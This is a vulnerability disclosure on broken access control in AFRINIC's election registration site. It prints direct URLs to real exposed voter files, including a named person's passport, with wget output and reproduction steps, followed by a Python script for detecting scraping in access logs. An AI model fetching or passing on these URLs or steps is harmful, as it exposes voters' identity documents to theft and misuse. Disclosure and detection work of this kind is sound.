<div style="font-family: Arial, sans-serif; font-size: 14px;"><pre>Security Vulnerability Report
Report Title: Unauthorized Access to Voter Personal Information on registration.afrinic.net.
Report Date: [02/08/2025]
Severity: High

 
1. Executive Summary
A security vulnerability was discovered in the AFRINIC election registration platform that allows unauthenticated users to access the personal information of registered voters. The exposed data includes passports and confidential documents such as letters of authorization.

 
2. Affected System(s)
Component: registration.afrinic.net
Version: n/a
Environment: wp-content/uploads/fluentform/ (WordPress uploads directory)
Example exposed file: https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf
 
3. Vulnerability Details
Type: Insecure Direct Object Reference (IDOR) / Broken Access Control
Impact: Exposure of Personally Identifiable Information (PII)
Authentication Required:  No
Exploitability: Remote, unauthenticated attackers can access voter data using direct URLs.
Example Requests:
GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf
GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg

Response (wget output; both files are served without any authentication):
ff-c7be0450e17f651c 100%[===================>] 333.34K  --.-KB/s    in 0.02s  
2025-07-31 10:16:02 (13.8 MB/s) - ‘ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf’ saved [341340/341340]
2025-07-31 10:25:28 (16.8 MB/s) - ‘ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg’ saved [144116/144116]
 
 
4. Steps to Reproduce
1. Open a browser or an HTTP client (e.g., wget or Postman) and send a GET request directly to an uploaded file's URL:

   GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf
   GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg

2. Open the downloaded PDF (or image) file.
3. Observe that voter PII is returned without any authentication token or session check.

5. Impact Assessment
Exploitation Potential: High — can be automated and scaled to scrape the full voter database.
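The scraping described above leaves a recognisable trace in the web server access log: a single client fetching many distinct files under wp-content/uploads/fluentform/ within a short time. The following Python check is an added example (not part of the original report); its log lines, client IPs and file names are constructed samples.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format as written by Apache/nginx; only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
UPLOADS_PREFIX = "/wp-content/uploads/fluentform/"

# Constructed sample log lines (documentation IPs, made-up file names): 203.0.113.7
# pulls five different uploads inside two minutes; 198.51.100.9 fetches one file twice.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Jul/2025:10:16:02 +0000] "GET /wp-content/uploads/fluentform/ff-a1-ff-letter-1.pdf HTTP/1.1" 200 341340 "-" "Wget/1.21"',
    '203.0.113.7 - - [31/Jul/2025:10:16:09 +0000] "GET /wp-content/uploads/fluentform/ff-a2-ff-passport-1.jpg HTTP/1.1" 200 144116 "-" "Wget/1.21"',
    '203.0.113.7 - - [31/Jul/2025:10:16:31 +0000] "GET /wp-content/uploads/fluentform/ff-a3-ff-letter-2.pdf HTTP/1.1" 200 300100 "-" "Wget/1.21"',
    '203.0.113.7 - - [31/Jul/2025:10:17:05 +0000] "GET /wp-content/uploads/fluentform/ff-a4-ff-passport-2.jpg HTTP/1.1" 200 150000 "-" "Wget/1.21"',
    '203.0.113.7 - - [31/Jul/2025:10:17:44 +0000] "GET /wp-content/uploads/fluentform/ff-a5-ff-letter-3.pdf HTTP/1.1" 200 320000 "-" "Wget/1.21"',
    '198.51.100.9 - - [31/Jul/2025:10:20:00 +0000] "GET /wp-content/uploads/fluentform/ff-b1-ff-letter-9.pdf HTTP/1.1" 200 310000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [31/Jul/2025:10:21:10 +0000] "GET /wp-content/uploads/fluentform/ff-b1-ff-letter-9.pdf HTTP/1.1" 200 310000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [31/Jul/2025:10:22:00 +0000] "GET /wp-content/uploads/fluentform/ff-b2-ff-missing.pdf HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "path": m.group("path"),
            "status": int(m.group("status"))}

def find_scrapers(lines, window=timedelta(minutes=5), max_files=3):
    """Map client IP -> largest number of distinct fluentform uploads it fetched
    successfully (HTTP 200) within any span of `window`; only IPs above max_files."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 200 and rec["path"].startswith(UPLOADS_PREFIX):
            per_ip[rec["ip"]].append((rec["ts"], rec["path"]))
    flagged = {}
    for ip, hits in per_ip.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            # sliding window anchored at each request: distinct files fetched from here on
            distinct = {path for ts, path in hits[i:] if ts - start <= window}
            if len(distinct) > max_files:
                flagged[ip] = max(flagged.get(ip, 0), len(distinct))
    return flagged
```

Run `find_scrapers` over the real access log rather than SAMPLE_LOG; the threshold and window should be tuned to how often a legitimate registrant re-opens their own upload.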

7. Disclosure Timeline
Date          Action
[02/08/2025]  Vulnerability discovered and published

8. References
OWASP: Insecure Direct Object References (IDOR)
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor</pre><br></div>